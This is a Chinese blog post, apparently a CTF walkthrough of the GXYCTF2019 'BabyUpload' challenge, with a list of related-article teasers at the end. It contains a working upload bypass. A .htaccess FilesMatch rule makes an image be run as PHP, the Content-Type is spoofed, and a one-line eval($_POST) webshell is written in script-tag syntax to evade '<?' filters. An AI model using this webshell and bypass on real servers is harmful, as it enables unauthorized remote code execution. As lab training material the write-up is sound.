练习 5 Web [GXYCTF2019]BabyUpload

2024-03-07 22:12

本文主要是介绍练习 5 Web [GXYCTF2019]BabyUpload,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

[GXYCTF2019]BabyUpload

  1. 猜测直接上传txt会被过滤,提示“上传类型也太露骨了吧!”
  2. 按经验传入一个"muma.phtml"
    提示过滤了“ph”相关的后缀
    在这里插入图片描述
  3. 传入muma.jpg等图像格式,提示表明复原并检测了文件内容
    在这里插入图片描述

审查文件后缀Context-type 不能有ph,image/jpeg可以
审查文件内容 不能是php
黑名单过滤

查阅wp,需要利用 .htaccess文件解析漏洞,并参考以下博客内容:

说人话就是,它可以把同目录下指定的某类后缀的文件解析成php代码执行.
原理:.htaccess文件(或者"分布式配置文件"),全称是Hypertext Access(超文本入口)。提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。作为用户,所能使用的命令受到限制。管理员可以通过Apache的AllowOverride指令来设置。
漏洞复现篇——.htaccess文件解析漏洞

逻辑上先传一个.htaccess文件(指定jpg格式被解析为php代码执行)上去,试试会不会被过滤
如果成功,再传一个修改为php后缀的木马文件,尝试通过木马控制
如果失败,需要寻找其他方法

<FilesMatch "muma.jpg">
SetHandler application/x-httpd-php   #在当前目录下,如果匹配到muma.jpg文件,则被解析成PHP代码执行
AddHandler php5-script .jpg         #在当前目录下,如果匹配到muma.jpg文件,则被解析成PHP代码执行
</FilesMatch>

文件名也被过滤了?修改文件名重新尝试
在这里插入图片描述
在这里插入图片描述

还是不行,参考多篇博文,注意php版本

更改语法格式,绕过以检测<?为方式检测php代码的手段

<? ?> —— < script language=“php”>< /script >

<script language="php"> eval($_POST['attack']);</script>

重新开始,上传.htaccess文件,必须要修改Content-Type: 为image/jpeg
在这里插入图片描述
在这里插入图片描述
参考博文:https://blog.csdn.net/RABCDXB/article/details/114297306

上传muma.jpg,成功
在这里插入图片描述
打开AntSword,连接木马
失败

重置靶机,修改木马文件后缀为png尝试(同样必须改Context-Type:image/png 为 image/jpeg)
成功连上
在根目录找到flag:flag{0e953d11-d228-4853-bca6-a7f86032756a}
在这里插入图片描述在这里插入图片描述
本篇总结:

  1. 一句话木马的变形,以绕过某些形式上的(例如对<? ?>)php内容检测
  2. 什么情况下可以利用web服务器.htaccess文件解析漏洞?

这篇关于练习 5 Web [GXYCTF2019]BabyUpload的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/784998

相关文章

JSON Web Token在登陆中的使用过程

《JSONWebToken在登陆中的使用过程》:本文主要介绍JSONWebToken在登陆中的使用过程,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录JWT 介绍微服务架构中的 JWT 使用结合微服务网关的 JWT 验证1. 用户登录,生成 JWT2. 自定义过滤

一文教你如何将maven项目转成web项目

《一文教你如何将maven项目转成web项目》在软件开发过程中,有时我们需要将一个普通的Maven项目转换为Web项目,以便能够部署到Web容器中运行,本文将详细介绍如何通过简单的步骤完成这一转换过程... 目录准备工作步骤一:修改​​pom.XML​​1.1 添加​​packaging​​标签1.2 添加

web网络安全之跨站脚本攻击(XSS)详解

《web网络安全之跨站脚本攻击(XSS)详解》:本文主要介绍web网络安全之跨站脚本攻击(XSS)的相关资料,跨站脚本攻击XSS是一种常见的Web安全漏洞,攻击者通过注入恶意脚本诱使用户执行,可能... 目录前言XSS 的类型1. 存储型 XSS(Stored XSS)示例:危害:2. 反射型 XSS(Re

解决JavaWeb-file.isDirectory()遇到的坑问题

《解决JavaWeb-file.isDirectory()遇到的坑问题》JavaWeb开发中,使用`file.isDirectory()`判断路径是否为文件夹时,需要特别注意:该方法只能判断已存在的文... 目录Jahttp://www.chinasem.cnvaWeb-file.isDirectory()遇

JavaWeb-WebSocket浏览器服务器双向通信方式

《JavaWeb-WebSocket浏览器服务器双向通信方式》文章介绍了WebSocket协议的工作原理和应用场景,包括与HTTP的对比,接着,详细介绍了如何在Java中使用WebSocket,包括配... 目录一、概述二、入门2.1 POM依赖2.2 编写配置类2.3 编写WebSocket服务2.4 浏

Spring常见错误之Web嵌套对象校验失效解决办法

《Spring常见错误之Web嵌套对象校验失效解决办法》:本文主要介绍Spring常见错误之Web嵌套对象校验失效解决的相关资料,通过在Phone对象上添加@Valid注解,问题得以解决,需要的朋... 目录问题复现案例解析问题修正总结  问题复现当开发一个学籍管理系统时,我们会提供了一个 API 接口去

使用IntelliJ IDEA创建简单的Java Web项目完整步骤

《使用IntelliJIDEA创建简单的JavaWeb项目完整步骤》:本文主要介绍如何使用IntelliJIDEA创建一个简单的JavaWeb项目,实现登录、注册和查看用户列表功能,使用Se... 目录前置准备项目功能实现步骤1. 创建项目2. 配置 Tomcat3. 项目文件结构4. 创建数据库和表5.

手把手教你idea中创建一个javaweb(webapp)项目详细图文教程

《手把手教你idea中创建一个javaweb(webapp)项目详细图文教程》:本文主要介绍如何使用IntelliJIDEA创建一个Maven项目,并配置Tomcat服务器进行运行,过程包括创建... 1.启动idea2.创建项目模板点击项目-新建项目-选择maven,显示如下页面输入项目名称,选择

Java Web指的是什么

Java Web指的是使用Java技术进行Web开发的一种方式。Java在Web开发领域有着广泛的应用,主要通过Java EE(Enterprise Edition)平台来实现。  主要特点和技术包括: 1. Servlets和JSP:     Servlets 是Java编写的服务器端程序,用于处理客户端请求和生成动态网页内容。     JSP(JavaServer Pages)

BUUCTF靶场[web][极客大挑战 2019]Http、[HCTF 2018]admin

目录   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 [web][HCTF 2018]admin 考点:弱密码字典爆破 四种方法:   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 访问环境 老规矩,我们先查看源代码